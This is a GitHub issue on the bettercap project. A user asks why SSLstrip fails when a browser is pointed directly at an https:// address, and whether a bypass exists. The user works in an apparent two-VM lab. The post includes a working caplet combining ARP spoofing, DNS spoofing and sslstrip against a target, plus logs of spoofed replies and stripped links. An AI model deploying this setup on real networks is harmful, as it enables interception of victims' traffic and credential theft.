Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSLstrip ruins a connection when type https:// in browser #1083

Open
MiroslavovichVlad opened this issue Mar 26, 2024 · 0 comments
Open

SSLstrip ruins a connection when type https:// in browser #1083

MiroslavovichVlad opened this issue Mar 26, 2024 · 0 comments

Comments

@MiroslavovichVlad
Copy link

MiroslavovichVlad commented Mar 26, 2024
edited

It will be just a question. I've read the manual and the closed issues, but I still don't understand: if I type https://example.com in the browser instead of just example.com, is there a mechanism that will open the https version of the site rather than showing the "Unable to connect" error? Something like sslstrip bypass. Maybe it exists, but I'm doing something wrong.

Environment

  • bettercap v2.32.0
  • OS version: kali-linux-2023.2
  • GO version: go1.22.1 linux/amd64
  • Two virtual machines on VirtualBox

Command line for starting bettercap:
sudo bettercap -caplet /home/kali/sslstrip_proxy.cap

Caplet code:

set http.proxy.sslstrip true
set arp.spoof.target 192.168.111.111
set dns.spoof.domains example.com
net.sniff on
arp.spoof on
http.proxy on
dns.spoof on

Steps to Reproduce

  1. Start bettercap with my caplet on the first VM
  2. On the second VM in the browser go to address https://example.com

Expected behavior:
SSLstrip not works and the browser opens page https://example.com

Actual behavior:
The browser shows error:
Unable to connect
An error occurred during a connection to example.com

Log from terminal:

192.168.8.0/24 > 192.168.8.112  » [11:51:25] [sys.log] [inf] dns.spoof sending spoofed DNS reply for example.com (->192.168.8.112) to 192.168.8.111 : 00:00:00:00:86:3a (Computer GmbH).
192.168.8.0/24 > 192.168.8.112  » [11:51:25] [sys.log] [inf] dns.spoof sending spoofed DNS reply for example.com (->192.168.8.112) to 192.168.8.111 : 00:00:00:00:86:3a (Computer GmbH).
192.168.8.0/24 > 192.168.8.112  » [11:51:26] [net.sniff.dns] dns 8.8.8.8 > 192.168.8.111 : example.com is local
192.168.8.0/24 > 192.168.8.112  » [11:51:26] [net.sniff.dns] dns 8.8.8.8 > 192.168.8.111 : example.com is local

It works if I'm typing in the browser just example.com

Log from terminal:

192.168.8.0/24 > 192.168.8.112  » [11:56:02] [sys.log] [inf] dns.spoof sending spoofed DNS reply for example.com (->192.168.8.112) to 192.168.8.111 : 00:00:00:00:86:3a (Computer GmbH).
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [sys.log] [inf] dns.spoof sending spoofed DNS reply for example.com (->192.168.8.112) to 192.168.8.111 : 00:00:00:00:86:3a (Computer GmbH).
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [sys.log] [inf] dns.spoof sending spoofed DNS reply for example.com (->192.168.8.112) to 192.168.8.111 : 00:00:00:00:86:3a (Computer GmbH).
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [net.sniff.dns] dns 8.8.8.8 > 192.168.8.111 : example.com is local
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [net.sniff.dns] dns 8.8.8.8 > 192.168.8.111 : example.com is local
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [net.sniff.dns] dns 8.8.8.8 > 192.168.8.111 : example.com is local
192.168.8.0/24 > 192.168.8.112  » [11:56:02] [sys.log] [inf] [sslstrip] Stripping 1 SSL link from example.com
192.168.8.0/24 > 192.168.8.112  » [11:56:03] [sys.log] [inf] [sslstrip] Stripping 1 SSL link from example.com

Maybe do I need something with iptables?

Thanks.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@MiroslavovichVlad